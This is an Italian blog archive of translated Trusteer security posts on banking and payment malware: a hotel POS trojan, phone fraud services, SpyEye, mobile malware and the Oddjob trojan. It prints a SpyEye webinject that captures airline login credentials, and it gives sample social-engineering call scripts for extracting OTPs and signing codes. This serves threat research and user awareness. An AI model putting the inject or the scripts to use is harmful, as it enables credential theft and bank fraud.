Archive for the ‘Trusteer’ Category

Nessuna prenotazione: trojan ad accesso remoto gratta carte di credito dagli hotel

aprile 21st, 2012, posted in Traduzioni inglese>italiano, Trusteer

Il post seguente è stato tradotto per gentile concessione di Trusteer

I nostri ricercatori del centro d’intelligence, recentemente, hanno scoperto un “pacchetto” frode in vendita nei forum underground che utilizza un Trojan ad accesso remoto per rubare dati delle carte di credito da un’applicazione point of sale (PoS) degli hotel. Questo schema, mirato al settore dell’ospitalità, mostra come i criminali stiano piazzando malware sulle macchine aziendali per raccogliere informazioni finanziarie, piuttosto che puntare i dispositivi degli utenti finali.

In questo scenario particolare, un trojan ad accesso remoto viene usato per infettare i computer della reception dell’hotel. Il malware è in grado di rubare carte di credito e altre informazioni dei clienti catturando schermate dall’applicazione PoS. Secondo il venditore, il trojan è garantito non rilevabile dai programmi antivirus.

No reservations

Questo pacchetto frode viene offerto a $280. Il prezzo include le istruzioni su come configurare il trojan. I venditori offrono anche consigli su come utilizzare tecniche di social engineering telefoniche tramite software VoIP, per ingannare i front desk manager e installare il trojan.

Per dimostrare l’efficacia del pacchetto frode, il venditore utilizza una schermata, (vedi sopra), tratta dal trojan ad accesso remoto dal sistema POS, presso una delle più grandi catene alberghiere del mondo. La schermata mostra l’applicazione POS popolata con le informazioni sui clienti raccolte al check-in.

Come accennato nei post più recenti, i criminali stanno ampliando sempre più l’obiettivo dei loro attacchi, dall’online banking alle aziende. Uno dei motivi di questo cambiamento è che i dispositivi aziendali, se compromessi, possono produrre beni digitali ad alto valore aggiunto.

Fonte: No Reservations – Remote Access Trojan Pilfers Credit Cards from Hotels

read more no comments

Applicare la sicurezza online per proteggersi offline

novembre 26th, 2011, posted in Traduzioni inglese>italiano, Trusteer

Il post seguente è stato tradotto per gentile concessione di Trusteer

Trusteer, in quanto partecipante alla campagna “Get Safe Online” di questa settimana nel Regno Unito, ha avvertito che le chiamate telefoniche fraudolente stanno acquistando popolarità nella comunità criminale con lo scopo di commettere furti d’identità; e che tutti debbono stare in guardia per evitare di diventare vittime, online o offline. Un possibile uso di queste false chiamate “bancarie”, potrebbe essere quello di rubare informazioni d’identificazione personale tramite malware per dare credibilità ai truffatori, mentre vengono raccolte le informazioni mancanti per ‘far funzionare’ gli scam.

Il fenomeno del furto dei dati tramite il web, utilizzato con altri mezzi o contesti come gli attacchi di social engineering, è spesso trascurato. Trusteer ha scoperto che i dati raccolti tramite gli attacchi Man in the Browser possono essere utilizzati per scopi diversi dalle frodi delle transazioni automatizzate. La difesa contro la nuova ondata di attacchi ibridi richiede sia la tecnologia per rilevare il malware MitB che vigilanza da parte degli utenti dei servizi online.

La frode tradizionale tramite malware finanziario inizia identificando la banca e imparando come funzioni il loro servizio di online banking. Una volta che i truffatori abbiano compreso come funzionino i flussi di online banking e i processi di sicurezza, viene progettato uno schema della truffa e si configura l’attacco malware corrispondente (ad esempio, un MitB security training scam discusso nei precedenti post sul blog http://www.trusteer.com/blog). Infine, i clienti della banca vengono infettati dal malware e la frode inizia la sequenza di esecuzione.

Altre forme di frode finanziaria tramite malware funzionano in senso inverso: prima il malware viene inserito nelle macchine delle vittime e traccia le attività online e le credenziali bancarie, poi, i truffatori, utilizzano i dati delle credenziali pescate dai log del malware per accedere ai siti di online banking e perpetrare frodi. La ricerca di Trusteer ha perfino individuato truffatori vendere i log di Zeus sul mercato libero. Il prezzo corrente è compreso tra 60cents e 1$ per 1 GB.

Tuttavia, il problema con questo metodo è che, in molti casi, i dati raccolti dal malware non sono sufficienti per commettere la frode reale:

  • Le credenziali d’autenticazione, one time password (OTP), originariamente raccolte non sono più valide
  • Le banche richiedono il Transaction Signing per trasferire denaro
  • La banca richiede dati di autenticazione aggiuntivi al momento dell’autenticazione da un nuovo indirizzo IP

I truffatori, per ottenere i dati mancanti necessari a effettuare con successo una frode online, possono ricorrere ai servizi di operatori professionisti. Una pubblicità di un forum, scoperta da Trusteer, offre un servizio telefonico con operatori professionisti che parlano fluentemente inglese ed altre lingue europee e che possono impersonare voci maschili e femminili, così come voci anziane e giovani. Come per qualsiasi attività commerciale, il servizio mostra “gli orari di apertura” sia per gli orari lavorativi americani che europei. Il prezzo è piuttosto ragionevole, 10 $ a chiamata. Questi criminali offrivano chiamate a clienti privati, banche, negozi, uffici postali e ogni altra organizzazione in base alle esigenze specifiche dei clienti. Avevano anche i numeri di telefono nel caso le vittime avessero voluto richiamare, per qualsiasi motivo. Ulteriori verifiche di sicurezza da parte di Trusteer rivelano che il gruppo è operativo dal 2009.

Sebbene i reali script del chiamante non siano stati condivisi nella pubblicità del forum, possiamo immaginare che quelli utilizzati per raccogliere i dati mancanti debbano essere simili a:

Fase 1: Il chiamante instaura credibilità
Il chiamante utilizzerebbe i dati raccolti dal malware per guadagnare credibilità, ad esempio chiederà “Sei John Smith, che vive in (indirizzo), con il numero di carta di credito che termina con 2345?”

Fase 2: Il chiamante raccoglie i dati mancanti
Una volta che il chiamante ha instaurato credibilità, inizierà a raccogliere:

a) L’OTP dell’SMS: ad esempio “Abbiamo appena inviato un SMS con un’OTP in modo da poter stabilire che è John Smith, può leggermelo?”
b) Ogni altra informazione di autenticazione aggiuntiva, ad esempio: “Per verificare, può, per favore, darmi le ultime quattro cifre del SSN?”
c) È possibile anche convincere l’utente a generare un transaction signing code tramite un beneficiario fraudolento e informazioni relative all’importo, ad esempio: “Abbiamo bisogno di calibrare il lettore del vostro transaction signing, potrebbe, per favore, inserire i seguenti dati online e dirci cosa succede ”

Mentre l’attenzione di tutti è focalizzata su come proteggersi nel mondo ‘virtuale’, è ancora molto a rischio, qui, nel mondo ‘reale’. I truffatori si rivolgono ai servizi telefonici nel tentativo di indurre le persone a rivelare informazioni riservate, ingaggiando professionisti per impersonare i rappresentanti delle organizzazioni finanziarie. La triste verità è che, in realtà, utilizzare il social engineering al telefono è molto più facile di quanto si creda.

È piuttosto inquietante realizzare quanto sia professionale il marketing del gruppo. Sostiene di avere una vasta esperienza di lavoro con clienti, banche e negozi. Mette in luce anche il proprio know-how finanziario, vantandosi che nella maggior parte dei casi, i bonifici bancari e le transazioni vengono completati.

Alle singole persone Trusteer consiglia che:

  • si assicurino di utilizzare soluzioni antimalware aggiornate, in particolare quelle consigliate dalla propria banca, per impedire, in prima istanza, il furto di dati
  • considerino tutte le telefonate non richieste con cautela, a prescindere da qualsiasi informazione di validazione possa fornire il chiamante
  • usi numeri forniti dalla banca, non dal chiamante, per verificare l’autenticità del contatto.

Fonte: Apply Security Online to Protect Yourself Offline

read more no comments

SpyEye cambia i numeri di telefono per effettuare l’hijack degli SMS Out of Band

ottobre 8th, 2011, posted in Traduzioni inglese>italiano, Trusteer

Il post seguente è stato tradotto per gentile concessione di Trusteer

Il team di ricerca Trusteer ha recentemente scoperto un nuovo attacco stealth, effettuato dal Trojan SpyEye, che aggira le misure di sicurezza dell’SMS (short message service) mobile adottato da molte banche. Utilizzando il codice che abbiamo catturato mentre proteggevamo un utente Rapport, abbiamo scoperto un attacco basato sul Web a due fasi, che permette ai truffatori di cambiare il numero di cellulare del conto bancario online di una vittima e reindirizzare i codici di conferma SMS utilizzati per verificare le transazioni online. Questo attacco, se riuscito, consente ai ladri di effettuare transazioni e verificarle all’insaputa dell’utente.

Fase 1

Nella prima fase dell’attacco, SpyEye ruba i dati di accesso bancari online della vittima. Una procedura standard per il malware finanziario come SpyEye, Zeus e altri. I truffatori ora possono accedere al conto della vittima senza allarmare i sistemi di rilevamento delle frodi.

Fase 2

Nella fase 2, SpyEye cambia il numero di telefono della vittima nel record nell’applicazione di banking online con uno dei vari numeri casuali controllati dall’attacker. Per completare questa operazione ha bisogno del codice di conferma inviato dalla banca al numero di telefono originale del cliente. Per rubarlo, l’attacker utilizza il seguente schema di social engineering.

In primo luogo, SpyEye inietta una pagina fraudolenta nel browser del cliente che sembra provenire dall’applicazione di banking online. La falsa pagina simula l’introduzione di un nuovo sistema di sicurezza, “richiesto” dalla banca, che necessita di registrazione da parte dei clienti. La pagina spiega che con questo nuovo processo di sicurezza al cliente verrà assegnato un numero telefonico univoco e che riceverà una speciale carta SIM via mail. Successivamente, all’utente verrà richiesto di inserire, nella pagina web fasulla, il numero di conferma personale ricevuto sul cellulare per completare il processo di registrazione del nuovo sistema di sicurezza. Questo permetterà ai criminali di rubare il codice di conferma di cui hanno bisogno per autorizzare il cambio del numero di cellulare del cliente.

Ecco una schermata della pagina fraudolenta creata da SpyEye e presentata al cliente (tradotta dallo spagnolo all’inglese):

Fraudulent page by Spyeye

Ora, i truffatori, possono ricevere qualsiasi futuro codice di verifica delle transazioni SMS dell’account per il quale hanno effettuato l’hijack tramite la propria rete telefonica. Questo permetterà loro di utilizzare il sistema di conferma SMS per deviare i fondi dal conto del cliente a sua insaputa, senza attivare alcun allarme di rilevazione frodi.

L’Out-of-Band non è una panacea

Quest’ultima configurazione di SpyEye dimostra che i sistemi out-of-band authentication (OOBA) , tra cui le soluzioni basate su SMS, non sono infallibili. Utilizzando una combinazione della tecnologia MITB (injection del man in the browser ) e social engineering, i truffatori non sono in grado soltanto di bypassare OOBA ma anche prendere tempo per verificare le transazioni e volare sotto il radar dei sistemi di rilevazione frodi. L’unico modo per sconfiggere questo nuovo attacco, una volta che un computer è stato infettato da SpyEye, è utilizzare la sicurezza degli endpoint che blocca le tecniche MITB. Senza un approccio a più livelli di sicurezza, anche gli schemi OOBA più sofisticati, in circostanze particolari, possono essere resi vani.

Fonte: SpyEye Changes Phone Numbers to Hijack Out of Band SMS

read more no comments

Malware mobile: perché i truffatori sono due passi avanti

agosto 16th, 2011, posted in Traduzioni inglese>italiano, Trusteer

Il post seguente è stato tradotto per gentile concessione di Trusteer

Cattive notizie: i truffatori hanno tutti gli strumenti necessari per trasformare efficacemente il malware mobile nel più grande problema di sicurezza mai riscontrato. Manca solo una cosa: la scelta del cliente. Il numero degli utenti che usano il banking online dai propri dispositivi mobili, è ancora relativamente basso. Inoltre le transazioni sui siti web di molte banche non sono ancora abilitate ai dispositivi mobili. Dal momento che le frodi online sono principalmente basate sui grandi numeri, attaccare gli utenti del banking mobile non è ancora una frode efficace. Ma aspettatevi un cambiamento. Ad un anno da ora, tutto sarà completamente diverso, quando molti più utenti inizieranno a utilizzare il banking dal proprio telefono cellulare e i truffatori passeranno alle maniere forti.

Trusteer ha calcolato che entro 12/24 mesi, 1 telefono Android ( ma anche iPad/iPhone) su 20 (5,6% ) potrebbe essere infettato con il malware mobile, se i truffatori cominceranno ad integrare le vulnerabilità mobili zero-day in exploit kit importanti.

Il paradiso dei truffatori: Google Android

L’architettura di sicurezza di Android non è all’altezza della sfida. Soprattutto per quanto riguarda la facilità di creare potenti applicazioni fraudolente e la facilità nel distribuirle. I truffatori possono facilmente creare applicazioni che hanno accesso a risorse sensibili del sistema operativo, come i messaggi di testo e voce, la posizione geografica e molto altro ancora. Agli utenti che installano una di queste applicazioni, comparirà un messaggio con un elenco delle risorse alle quali l’applicazione richiederà l’accesso; ma, generalmente, verrà ignorato, visto che molte applicazioni richiedono l’accesso a un ampio elenco di risorse. Creare una potente applicazione fraudolenta per Android che rubi ed abusi della vostra identità e del vostro conto in banca, è quasi banale. Distribuire queste applicazioni sull’Android Market è ancora più banale.

Non vi sono controlli reali dell’intero processo di upload, che potrebbero identificare e impedire la pubblicazione di applicazioni dannose in questi store. Rispetto all’App Store di Apple, l’Android Market è il selvaggio West. Non ci si può sempre fidare delle applicazioni che si scaricano.

I truffatori ​​hanno già iniziato ad abusare di questa grande falla nella sicurezza. Dozzine di applicazioni dannose sono già state individuate nell’Android Market. Google ne ha rimosso la maggior parte ma altre continuano ad arrivare. Trusteer ha identificato applicazioni pericolose sull’Android Market che sono rimaste per settimane prima di essere rimosse da Google.

L’utente medio fatica a individuare questa pagina , che permette di richiedere a Google di analizzare e rimuovere le applicazioni inappropriate dall’Android Market.
Ma non aspettatevi che Google reagisca velocemente a ciò che avete inviato tramite questo modulo. Lo abbiamo usato alcune volte senza risultati.
Per rimuovere un’applicazione dal Google Market, in realtà, abbiamo dovuto utilizzare contatti interni a Google, che non sono disponibili all’utente medio. Il processo di identificazione e rimozione delle applicazioni dannose dall’Android Market, richiede importanti miglioramenti.

La maggior parte delle applicazioni dannose che hanno colpito Android non sono finanziarie. Tuttavia, nel maggio di quest’anno, abbiamo visto il (già noto) malware Man in the Mobile (MitMo) che aveva già attaccato i telefoni Symbian, Blackberry e Windows in fase di porting per Android. Questo attacco è stato progettato per bypassare l’SMS Out of Band (OOB) dei processi di autenticazione e di verifica delle transazioni delle banche. La prossimità di questo attacco con la recente guida FFIEC che consiglia alle banche di prendere in considerazione, tra gli altri, l’Out of Band per combattere gli attacchi di malware, risulta ironico. Dimostra esattamente perché i truffatori sono due passi avanti.

Per chi non sapesse come funzioni OOB, ecco una breve descrizione: l’idea generale è quella di combattere il malware che infetta la macchina dell’utente. Quando l’utente accede al sito di una banca da un PC infetto da malware finanziario come Zeus o SpyEye, il malware s’impossessa della sessione web e inietta transazioni fraudolente per conto dell’utente. Con OOB attivato, la banca invia un messaggio di testo al numero di telefono pre-registrato dell’utente. Il messaggio include i dettagli della transazione e un codice di verifica. L’utente dovrà copiare il codice di verifica dal dispositivo mobile al browser del PC. Il presupposto è che se la transazione è stata generata dal malware, l’utente non completerà il processo e non copierà il codice di conferma nel browser; di conseguenza la banca non approverà la transazione.

L’attacco MitMo fa cadere questo presupposto: quando l’utente viene infettato e cerca di accedere al sito web della banca, il malware entra in gioco e chiede all’utente di scaricare un’autenticazione, o un componente di sicurezza sul dispositivo mobile per completare il processo di login. L’utente crede, erroneamente, che questo messaggio provenga dalla banca, mentre in realtà proviene dal malware.Quando l’utente installa il malware sul dispositivo mobile, i truffatori controllano sia il PC dell’utente che il telefono. Successivamente il ​​malware genera una transazione fasulla per conto dell’utente. La banca invia un messaggio di conferma al dispositivo mobile dell’utente. Il malware legge il messaggio di conferma e lo invia al malware sul PC. Quindi, elimina il messaggio di conferma dal dispositivo mobile in modo che l’utente non lo veda. Il malware sul PC inserisce il codice di conferma e approva la transazione.

Ciclo d'attacco MitMo

Il malware per Android diffuso a maggio di quest’anno, è di diversi tipi. In uno si utilizzava anche il marchio Trusteer per guadagnare la fiducia degli utenti e convincerli a scaricare l’applicazione. Lo stesso malware è stato usato insieme a Zeus 2.1.0.10. Il pc dell’utente è stato prima infettato da Zeus, che successivamente mostrava il messaggio per scaricare il componente malware di Android.

Applicazione Android fraudolenta che utilizza MitMo e abusa del marchio Trusteer

Chi ha già scaricato Trusteer Rapport è protetto da questo tipo di attacco.

Apple iOS non è così sicuro come si possa pensare

IOS è il sistema operativo dell’iPad iPhone e iPod. Con il malware per iOS, è una storia leggermente diversa. Non è facile creare applicazioni dannose che abbiano accesso alle risorse del dispositivo, visto che iOS effettua rigorosi controlli sull’accesso alle applicazioni. Non è nemmeno facile immettere applicazioni pericolose sull’App Store, visto che Apple effettua una revisione manuale di ogni applicazione presentata, che permette di rilevare applicazioni illegali.

Tuttavia, c’è una falla in questa architettura di sicurezza e si chiama jailbreaking. Un dispositivo IOS con il jailbreaking non impone il controllo degli accessi e permette, in pratica, a qualsiasi app di fare ciò che vuole sul dispositivo. Purtroppo molti utenti effettuano il jailbreak dei propri dispositivi, visto che vogliono eseguire tipi di applicazioni che non sono su App Store. Ma cosa ancor più grave è che le vulnerabilità di IOS potrebbero consentire a siti Web dannosi di effettuare il jailbreak del dispositivo e infettarlo con malware senza il consenso, o la consapevolezza dell’utente. La scorsa settimana abbiamo visto un buon esempio proprio di questo.

JailbreakMe.com ha pubblicato un exploit che permette il jailbreaking automatico dei dispositivi IOS da un sito Web appositamente creato. I file PDF che sfruttano questa vulnerabilità, sono liberamente disponibili. Anche fare clic su un documento in formato PDF, o navigare su un sito web che contenga documenti PDF, è sufficiente per infettare il dispositivo mobile con il malware. Ora, il concetto di siti web dannosi che sfruttino gli exploit per infettare dispositivi endpoint, è ben noto ai truffatori. Il famigerato BlackHole exploit kit e altri, quali Fragus e Neosploit, automatizzano questi processi. BlackHole è estremamente pericoloso e ampiamente utilizzato in quanto distribuito gratuitamente. Milioni di siti sono stati compromessi per eseguire questi exploit kit.

Quando gli utenti accederanno ad uno di questi siti web compromessi, verranno infettati dal malware. I truffatori possono utilizzare lo stesso exploit kit per qualsiasi parte del malware. Quando gli autori di BlackHole aggiungeranno le vulnerabilità IOS al loro kit, assisteremo a un rapido aumento della distribuzione di malware sui dispositivi IOS. Questa recente vulnerabilità non è la prima che abbia permesso ai truffatori di compromettere dispositivi IOS e non sarà l’ultima. Stiamo osservando solamente l’inizio del problema.
I truffatori continueranno ad analizzare IOS e ne scopriranno vulnerabilità, che permetteranno loro di compromettere i dispositivi e commettere frodi. Spero di sbagliarmi, ma ad un anno da ora, tutto questo potrebbe diventare così comune da non fare nemmeno notizia.

Conclusione

Solo negli Stati Uniti, il 50% dei telefoni cellulari sono smartphone, con Android e iPhone veri leader del mercato. In aprile di quest’anno, un sondaggio tra gli utenti di smartphone del Solutions Research Group con sede a Toronto, l’ha dimostrato e ha mostrato che il 38% usa un’applicazione bancaria.

Questi due numeri sono in costante aumento e stanno per diventare abbastanza grandi affinché i truffatori inizino ad usare le maniere forti.

Tutti gli elementi essenziali sono presenti: i truffatori vanno alla ricerca di vulnerabilità per IOS e Android, possiedono exploit kit efficaci per automatizzare il processo, compiono operazioni su larga scala che compromettono siti web e li costringono a distribuire malware e hanno malware per cellulari che può commettere frodi. A mio parere, tutto questo porta ad una conclusione: stiamo per affrontare uno tra i peggiori problemi di sicurezza che sia mai esistito e non passerà molto tempo prima che avvenga.

Le soluzioni anti-malware per la telefonia mobile rappresentano difficilmente la risposta a questo problema. Queste soluzioni non sono molto diverse rispetto alle loro controparti per PC. Sono basate sull’analisi delle applicazioni installate sul dispositivo e un elenco di note applicazioni dannose. Questo tipo di soluzione non è scalabile quando il numero di applicazioni dannose aumenta vertiginosamente. Visto l’aumento del malware mobile, stiamo per affrontare lo stesso problema delle soluzioni per gli antivirus desktop: bassa efficacia.

Si rende necessaria una soluzione diversa, con un approccio diverso alla sicurezza mobile: che impedisca a questi dispositivi d’infettarsi e possa proteggere la comunicazione mobile con le banche dal malware che, eventualmente, dovesse finire sul dispositivo. Questo principio è stato usato con successo da Trusteer Rapport per proteggere 150 banche in tutto il mondo e ora è disponibile per IOS e Android. Trusteer Mobile sarà lanciato entro la fine dell’anno, in collaborazione con alcune importanti banche e sta per cambiare il modo in cui le banche e i loro clienti pensano la sicurezza mobile.

Raccomandazioni per rendere sicuro il mobile banking:

  1. Controllate la reputazione, le recensioni degli utenti ed i commenti di ogni applicazione mobile che scaricate. Evitate le applicazioni con un basso punteggio, quelle nuove, o con recensioni negative.
  2. Prestate attenzione ai permessi richiesti dalle applicazioni Android quando le installate. Le applicazioni che chiedano l’accesso ai messaggi di testo e ad altre informazioni sensibili, dovrebbero mettervi in allarme e farvi compiere ulteriori ricerche prima di scaricarle
  3. Proteggete il vostro PC con un software di sicurezza per l’online banking come Trusteer Rapport, che potrete scaricare dal sito della vostra banca. Questo software può bloccare gli attacchi MitMo, impedendo ai truffatori di controllare il canale web.
  4. Installate regolarmente gli aggiornamenti per il vostro dispositivo mobile

Calcolo dei tassi di infezione degli smartphone per gli exploit zero day

Le statistiche Trusteer di giugno 2011 mostrano che ogni giorno un utente su 1500 accede a un sito web infettato con l’exploit kit BlackHole. Ogni giorno, 667 utenti su un milione accederanno all’exploit kit BlackHole . Ipotizzando che l’exploit kit BlackHole integri una vulnerabilità zero day, come la recente JailbreakMe, ciò indica 667 utenti infetti al giorno su 1 milione. Ipotizzando che ad Apple o Google serva una settimana per risolvere la vulnerabilità e in media 2 settimane agli utenti per aggiornare il proprio cellulare con una nuova release, ciò indica una media di 21 giorni di esposizione, in cui 14.000 utenti su un milione vengono infettati con l’attacco zero day. Ipotizzando 4 exploit zero day in un anno, arriviamo a 56.000 infezioni all’anno per milione di utenti, pari al 5,6%: un numero estremamente elevato.

Fonte: Mobile Malware: Why Fraudsters Are Two Steps Ahead

read more no comments

Il trojan SpyEye colpisce siti web di compagnie aeree che accettano carte di debito bancarie

giugno 22nd, 2011, posted in Traduzioni inglese>italiano, Trusteer

Il post seguente è stato tradotto per gentile concessione di Trusteer

Abbiamo scoperto una versione di SpyEye che colpisce gli utenti dei siti web di due compagnie aeree leader in Europa: Air Berlin, seconda compagnia aerea in Germania (dopo Lufthansa) e AirPlus, fornitore globale di servizi di business travel per le aziende. SpyEye usa la macchina dell’utente, non i siti, per effettuare questo tipo di frode.

I soggetti da attaccare sono ben lungi dall’essere scelti a caso ma, crediamo, siano accuratamente scelti per il loro potenziale di guadagno criminale. Un sito accetta pagamenti con carte di debito, mentre l’altro si rivolge agli utenti aziendali.

Air Berlin, la sesta compagnia aerea in Europa, non solo accetta carte di debito e di credito; ma permette ai cittadini austriaci, olandesi e tedeschi di pagare con addebito bancario diretto sette giorni prima della partenza.

Di conseguenza, i criminali che colpiscano un viaggiatore Air Berlin da questi paesi, hanno una buona probabilità di ottenere i dati personali degli utenti; tra cui la data di nascita, obbligatoria sul sito della compagnia aerea, così come i loro dati bancari.

Air Plus, invece, offre una varietà di servizi per le aziende di tutte le dimensioni tramite il loro sito, tutti pagati con carte di pagamento aziendali, immancabilmente connesse a conti bancari aziendali.

Visto che i conti aziendali tendono ad avere saldi (o limiti di credito) maggiori rispetto ai conti consumer, hanno un potenziale di guadagno cibercriminale maggiore per quanto riguarda la prospettiva della raccolta dati.

Nel caso dell’attacco di Air Berlin, SpyEye cerca di raccogliere informazioni riservate degli utenti, tra cui nomi utente e password e altri dati inseriti nella pagina web colpita. Dal momento che Air Berlin accetta pagamenti con carte di debito bancarie, il potenziale di frode è ancora maggiore.

Il codice dell’injection di SpyEye cattura le informazioni in merito ai dettagli di nomi utente e password:

<WebInjects action=”Inject|POST|GET”>
<Url><![CDATA[https://www.airberlin.com/site/yab/login/login*]]></Url>
<AuxUrl><![CDATA[]]></AuxUrl>
<WebInject>
<Before><![CDATA[<body>]]></Before>
<Data><![CDATA[<iframe name=ifr1 id=ifr1 src="https://www.airberlin.com/site/images/spacer.gif" width=0 height=0 border=none>
</iframe>
<form id=form7 name=form7 target=ifr1 method=post action="https://www.airberlin.com/site/images/spacer.gif">
<input type="hidden" name="cc" id="cc" />
<input type="hidden" name="pas" id="pas" />
</form>
<script>
function dosubmit(){
document.form7.cc.value=document.getElementById('login').value;
document.form7.pas.value=document.getElementById('pass').value;
document.form7.submit();
}
</script>]]></Data>
<After><![CDATA[]]></After>
</WebInject>
<WebInject>
<Before><![CDATA[name="yabLogin" id="yabLogin"]]></Before>
<Data><![CDATA[ onclick="dosubmit()"]]></Data>
<After><![CDATA[]]></After>
</WebInject>

La metodologia di attacco di AirPlus, invece, colpisce gli utenti della carta di credito Lufthansa Miles & More del circuito Visa che offre viaggi premio per gli acquisti effettuati con la carta.

Simile all’attacco di Air Berlin, il codice di SpyEye colpisce l’URL di login del portale AirPlus:

<Url><![CDATA[https://portal.airplus.com/welcome*]]></Url>
<Url><![CDATA[https://www.miles-and-more.kartenabrechnung.de/welcome*]]></Url>

In questo caso, SpyEye, inietta il codice nel browser degli utenti, sostenendo di essere un miglioramento anti-frode.

In realtà, naturalmente, è un tentativo abilmente dissimulato di effettuare il phishing delle credenziali dell’ignaro cliente del portale di AirPlus.

Queste credenziali sono molto complete: includono tipo e numero della carta, la data di scadenza, il codice CVV (banda della firma del titolare) e, come per l’attacco ad Air Berlin, la data di nascita dell’utente.

La sottrazione delle date di nascita dell’utente permette il furto d’identità e – come abbiamo osservato – la frode impersonando l’utente e utilizzando metodi di attacco tramite social engineering ( si fa riferimento a un blog recente?)

Conclusioni

È importante capire che, ormai, il crimine informatico è altamente organizzato, con specializzazione delle funzioni all’interno dei diversi membri della gerarchia criminale.

Ciò significa che le gang di darkware coding, creatrici di queste varianti di SpyEye, stanno scegliendo con cura i loro obiettivi per ottenere il massimo rendimento con il minimo sforzo.

Inoltre, aumentando il rendimento di ogni vittima, le possibilità di rivendere i dati vanno ben al di là dei semplici forum di carder visti in quest’ultimi anni.

Siamo convinti che la(le) gang di cibercriminali dietro a questi attacchi, stia(no), quasi certamente, utilizzando una metodologia semi-automatica di sviluppo del codice, che consenta (loro) di sviluppare versioni personalizzate del malware per scopi specifici.

Chiaramente il commercio turistico permette ai cibercriminali di accedere alle credenziali degli account utente e aziendali con saldi e limiti di credito più grandi del normale.

“La ciliegina sulla torta” di poter accedere anche ai dettagli del conto bancario di Air Berlin in Austria, Germania e Paesi Bassi, è indice di ingegno mirato.

Purtroppo, i tradizionali meccanismi di sicurezza antivirus non sono per niente in grado di proteggere gli utenti aziendali dall’infezione di SpyEye, in quanto utilizza un’individuazione mirata, unitamente a tecniche di evasione della rilevazione della firma per mettere piede all’interno dei computer.

Un’alternativa migliore per proteggere i servizi basati sul web, è quella di realizzare un accesso sicuro al web. Ad esempio, strumenti di sicurezza basati su browser che rendano la comunicazione sicura tra il computer e il sito web del servizio cloud del provider, possono impedire ai metodi di attacco più comuni, come l’iniezione di codice HTML e il keylogging, di catturare dati. Queste stesse tecnologie possono essere usate per proteggere altre applicazioni basate su browser, come VPN, CRM, i sistemi retail, finanziari e di collaborazione che possono essere sfruttati da malware per rubare le credenziali utente e violare il perimetro di sicurezza di un’impresa del tutto inosservati.

Attendiamo di vedere versioni ancor più specializzate di SpyEye a breve.

Fonte: SpyEye Trojan Targets Airline Website that Accepts Bank Debit Card

read more no comments

Nuovo trojan finanziario lascia le sessioni di online banking attive dopo il “logout” degli utenti

marzo 28th, 2011, posted in Traduzioni inglese>italiano, Trusteer

Il post seguente è stato tradotto per gentile concessione di Trusteer

Abbiamo scoperto un nuovo tipo di malware finanziario che effettua l’hijack delle sessioni di online banking dei clienti “in tempo reale “, usando i token dei loro ID di sessione.

Oddjob, il nome che abbiamo dato a questo trojan, lascia le sessioni attive dopo che i clienti pensano di essersi “disconnessi”; ciò consente ai criminali di prelevare denaro e compiere frodi senza essere notati. Un malware completamente nuovo che supera i limiti dell’hacking attraverso l’evoluzione delle metodologie di attacco esistenti. Ciò dimostra come l’abilità commerciale dell’hacker possa eludere molte applicazioni per la sicurezza IT tradizionalmente usate per difendere i beni digitali – e finanziari – degli utenti.

Abbiamo monitorato Oddjob per alcuni mesi ma non siamo stati in grado di riferire sulle sue attività, finora, a causa di indagini in corso da parte delle forze dell’ordine. Ora appena terminate.

Il nostro team di ricerca ha effettuato il reverse engineering e analizzato il codice di Oddjob, proprio delle banche colpite e dei suoi metodi di attacco. Trusteer ha già avvertito le istituzioni finanziarie che Oddjob è utilizzato da criminali con sede nell’Europa orientale per attaccare clienti in diversi paesi, inclusi USA, Polonia e Danimarca.

L’aspetto più interessante di questo malware è che sembra essere in divenire, viste le differenze nelle funzioni hook negli ultimi giorni e settimane e il modo in cui i protocolli dei Command&Control (C&C) funzionano. Riteniamo che queste funzioni e protocolli continueranno a evolvere nel prossimo futuro e che la nostra analisi della funzionalità del malware non potrà essere al 100 per cento completa, visto che chi scrive il codice continuerà a rifinirlo.

La caratteristica più evidente di Oddjob è che è stato progettato per intercettare le comunicazioni degli utenti tramite il browser. Utilizza questa capacità per rubare/iniettare informazioni e terminare le sessioni utente all’interno di Internet Explorer e Firefox.

Abbiamo estratto i dati di configurazione di Oddjob, concludendo che è in grado di eseguire diverse azioni sui siti Web vittima, a seconda di come viene configurato. Il codice è in grado di effettuare il log delle richieste GET e POST, catturando pagine complete, terminando le connessioni e iniettando dati nelle pagine web.

Tutte le richieste dei log e delle pagine catturate vengono inviati al server C&C in tempo reale, permettendo ai truffatori di effettuare l’hijack di sessione, anche in tempo reale; ma senza che l’utente legittimo del conto bancario online ne sia al corrente.

Tramite il tapping dell’ID del token di sessione, che le banche utilizzano per identificare la sessione di banking online di un utente, i truffatori possono spacciarsi per l’utente legittimo e completare una serie di operazioni bancarie.

La differenza più importante rispetto agli hacking tradizionali è che i truffatori non hanno bisogno di autenticarsi ai computer che effettuano l’online banking, si limitano a sovrapporsi alla sessione esistente e autenticata; come un bambino potrebbe scivolare inosservato attraverso un tornello a un evento sportivo, stazione ferroviaria, ecc…

Un’altra caratteristica interessante di Oddjob, che lo distingue dalla folla del malware, è la sua capacità di bypassare la richiesta di disconnessione di un utente per chiudere la sessione online. Dato che l’intercettazione e la chiusura avvengono in background, l’utente legittimo pensa di essersi disconnesso, mentre, in realtà, i truffatori rimangono connessi; consentendo loro di massimizzare il potenziale di profitto delle loro attività fraudolente.

L’intero matching è case-insensitive e, tramite questo processo di pattern matching, i truffatori che usino Oddjob saranno in grado di scegliere accuratamente le sessioni e gli obiettivi per trarne il migliore vantaggio.

L’ultimo aspetto degno di nota di Oddjob è che la configurazione del malware non viene salvata su disco, processo che potrebbe attivare un’analisi di sicurezza; invece, ogni volta che si apre una nuova sessione del browser, viene recuperata dal server C&C una nuova copia della configurazione.

La buona notizia è che il software Rapport secure web access di Trusteer, attualmente utilizzato da milioni di clienti che usano l’online banking, può impedire che Oddjob venga eseguito.

Oddjob è soltanto una delle numerose applicazioni di malware pro-attivo che il nostro gruppo di ricerca nota regolarmente, ma la sua metodologia di codifica implica parecchio lavoro da parte dei coder che stanno dietro al fraudware.

Sono necessarie attente analisi e ricerca per effettuare il reverse engineering e analizzare applicazioni fraudolente come Oddjob, ma il nostro messaggio alle banche e ai loro utenti di servizi bancari online è immutato. Hanno bisogno di mantenere una vigilanza costante, applicare gli aggiornamenti software, essere consapevoli delle minacce nuove e implementare sofisticate soluzioni di sicurezza complementari che possano difendere da metodi di attacco sempre in evoluzione .

Fonte: New Financial Trojan Keeps Online Banking Sessions Open after Users “Logout”

read more no comments